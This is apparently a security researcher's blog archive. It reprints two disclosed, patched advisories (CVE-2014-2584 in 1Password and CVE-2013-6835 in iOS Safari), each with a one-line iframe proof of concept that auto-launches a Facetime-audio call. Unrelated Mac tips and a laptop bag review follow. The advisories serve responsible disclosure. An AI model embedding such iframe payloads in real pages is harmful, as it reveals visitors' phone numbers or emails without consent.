Archive for Apple

BSidesLV Talk on iOS URL Schemes

Seeing as “RTFM 0Days” are popular for iOS today, if you are looking for those, I highly recommend watching my BSidesLV presentation. Examples start at around 10minutes in.

RTFM 0day in iOS apps –

RTFM 0day in iOS apps: G+, Gmail, FB Messenger, etc. –

I’ve been talking and writing about this for about a year, and this is another GREAT set of examples and techniques.
If you want to see examples as well as help on how to find these, I highly recommend that you watch my presentation, which I have just posted as well.

[CVE-2014-2584] – 1Password Launching external apps automatically through use of iframe

[CVE-2014-2584] – 1Password Launching external apps automatically through use of iframe

  • Affected Vendor:
  • Affected Software: 1Password for iOS
  • Affected Version: 4.x prior to 4.5.0
  • Issue Type: Lack of user confirmation leading to execution of external app
  • Release Date: April 23, 2014
  • Discovered by: Guillaume Ross / @gepeto42
  • CVE Identifier: CVE-2014-2584
  • Issue Status: Vendor has published version 4.5 which corrects this issue by prompting the user before executing another application.


1Password is a password manager for iOS which includes a web browser. The browser has features such as automatic username and password completion. Some apps, such as Facetime, provide URL Scheme functionality that could reveal the user’s identity. Apple protects some of these built-in applications by prompting the user before launching the app. As this protection is built into Safari and not into Facetime itself, 3rd party apps that include a browser are often vulnerable to this, or more precisely, enable other vulnerabilities.


The 1Password browser in versions prior to 4.5.0 executed external URL Schemes automatically when they were placed in an inline frame. This could lead to issues identical to CVE-2013-6835. Applications should not trust the browser to prompt the user before triggering an action, however, as built-in apps like Facetime do so, browser vendors should include some protection. The same iframe code as for CVE-2013-6835 would trigger a Facetime-Voice call automatically, leaking the user’s “caller ID” information (phone number or registered email address).

See CWE-939 – Improper Authorization in Handler for Custom URL Scheme for more information.


A user browsing the web could click a malicious link or load a page containing a malicious link within an inline frame. The attacker can use this to trigger applications with URL Schemes that perform automatic actions, such as Facetime, and leverage those actions against the user.

Proof of Concept

<iframe src="facetime-audio://[email protected]" ></iframe>

Response Timeline

  • March 19 2014 – Vendor notified
  • March 20 2014 – Vendor acknowledges vulnerability
  • April 22 2014 – 1Password 4.5 for iOS is released and resolves the issue
  • April 23 2014 – Vulnerability Disclosed

The fix

Here is how 1Password 4.5+ behaves when opening such links.


1Password Prompt

1Password now prompts before launching external applications.

[CVE-2013-6835] – iOS 7.0.6 Safari/Facetime-Audio Privacy issue

[CVE-2013-6835] – iOS 7.0.6 Safari/Facetime-Audio Privacy issue

  • Affected Vendor:
  • Affected Software: Safari/Facetime on iOS
  • Affected Version: iOS 7 prior to 7.1
  • Issue Type: Lack of user confirmation leading to a call being established, revealing the user’s identity (phone number or email address)
  • Release Date: March 10, 2014
  • Discovered by: Guillaume Ross / @gepeto42
  • CVE Identifier: CVE-2013-6835
  • Issue Status: Vendor has published iOS 7.1 which resolves this issue by adding a prompt before establishing the call.


Facetime allows video calls for iOS. Facetime-audio, added in iOS 7, allows audio only calls. The audio version uses a vulnerable URL scheme which is not used by Facetime Video.
The URL Scheme used for Facetime-Audio allows a website to establish a Facetime-audio call to the attacker’s account, revealing the phone number or email address of the user browsing the site.

By entering the URL in an inline frame, the attack is automated, and similar to a CSRF attack across apps. Safari does not prompt the user before establishing the call.


A user browsing the web could click a malicious link or load a page containing a malicious link within an inline frame. The user would then automatically contact the phone number or email address specified in the URL, revealing his identity to the attacker.

Proof of Concept

Entering the following URL in iOS would trigger the call to the email address specified: facetime-audio://[email protected]

This inline frame would have the user call the specified email address as soon as the HTML page is loaded, without prompting the user:

<iframe src="facetime-audio://[email protected]" ></iframe>

External link: Security Content of iOS 7.1

Rage inducing quit fix for VMware Fusion and Cmd-Q

Sick of hitting cmd-q to quit an app in a VM but then shutting down VMware Fusion and 6 VMs that get suspended and that you need to restart and ARGHH?

Who isn’t?

Just go in Fusion’s preference menu and do this.

It’ll work as long as the mouse focus is in a VM. If you hit cmd-q while Fusion has focus but no VM does, you will still end up quitting Fusion.

This should still resolve 90% of my ARGH-quits.

Review of the Thule Attaché 15 for Macbook Pro and iPad – Retina too!

If you recently got your MacBook Pro with Retina display(tm) – which we will call rMBP here, you’ve probably been searching for a good bag to go with it. 
Not many bags exist that were made exactly for the rMBP, however, any regular MBP 15 bag will fit it. The trick was to find one that fit the non Retina MBP as tightly as possible and to use that.

SFBags, Tom Binh etc all have stuff available, but I don’t dig the look of nylon and other “nice leathers” available at SFBags. I also don’t dig having to use a separate sleeve for my laptop. When I want to take it out, I don’t want to mess around. I also prefer to not pay $300 for a bag. Insert stuff about being too cheap to “properly protect your investment that you paid so much for blah blah”.

Here’s a quick review of the Thule Attaché 15 for iPad and Macbook Pro. Pictures are at the end.

Continue reading »

Removing broken links from sidebar in Lion

A very small post for people searching about this specific issue:

You’re trying to delete an icon/shortcut from the sidebar in Finder, under Mac OS X Lion/10.7.

Right clicking doesn’t work, because that folder does not exist, or maybe it points to a share using an old version of AFP or SMB that you can’t connect to, because some company that almost has the same name as a famous dog if you pronounce it in french is a bad company that doesn’t update the firmware on any hardware old enough to have a lot of important data on it.

What you need to do is hold command and drag it to Trash instead of doing a right click.

Swedish Greys - a WordPress theme from Nordic Themepark.